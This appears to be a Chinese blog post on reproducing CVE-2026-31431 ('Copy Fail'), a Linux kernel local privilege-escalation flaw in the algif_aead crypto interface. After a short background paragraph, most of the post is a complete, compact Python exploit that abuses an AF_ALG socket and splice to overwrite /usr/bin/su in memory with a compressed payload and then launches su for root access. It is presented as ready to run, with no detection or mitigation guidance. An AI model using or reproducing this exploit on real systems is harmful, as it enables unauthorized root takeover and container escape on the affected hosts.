复现漏洞 CVE-2026-31431

  1. 一、背景

CVE-2026-31431 是 Linux Kernel 本地权限提升漏洞,涉及 Linux 内核 algif_aead 模块(AF_ALG 加密接口)相关路径。 攻击者在具备本地普通用户或容器内代码执行权限的情况下,可能利用该漏洞提升系统权限。

2026-04-29,安全研究团队 Theori 公开披露 Linux 内核高危漏洞CVE-2026-31431(代号 Copy Fail)。普通用户权限即可提权至 root,732 字节 Python 脚本通杀 Ubuntu/RHEL/SUSE/Amazon Linux 等所有主流发行版;容器内可逃逸至宿主机,影响云原生与多租户环境。

二、使用python3.10 以上版本

bash 复制代码
#!/usr/bin/env python3
import os as g,zlib,socket as s
def d(x):return bytes.fromhex(x)
def c(f,t,c):
 a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+
'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3
),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
 try:u.recv(8+t)
 except:0
f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a15
4d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
while i<len(e):c(f,i,e[i:i+4]);i+=4
g.system("su")
~
相关推荐
随身数智备忘录2 小时前
设备档案模板详解:设备档案模板如何覆盖设备全生命周期信息?
服务器
灵晔君2 小时前
【Linux】进程(一)
linux·运维·服务器
李日灐2 小时前
< 9 > Linux 进程:进程状态 + 进程切换 + 附带常用指令(jobs / fg / kill / ps)
linux·运维·服务器·后端·面试·进程状态
无忧.芙桃2 小时前
硬核拆解:Linux动态库从原理到实战
linux·运维·服务器
LinuxGeek10242 小时前
CVE-2026-31431 - Linux Copy-Fail 漏洞利用 (Rust版本)和检测方案
linux·运维·服务器
xinhuanjieyi2 小时前
vscode插件,.sec / .inc / .sc 文件添加关键字高亮
java·服务器·vscode
learning-striving2 小时前
centos9安装docker测试成功教程
linux·运维·服务器·docker·容器
Data_Journal2 小时前
Puppeteer指纹识别指南:循序渐进,简单易学!
服务器·前端·人工智能·物联网·媒体
feng_you_ying_li2 小时前
linux之文件系统(3)
linux·运维·服务器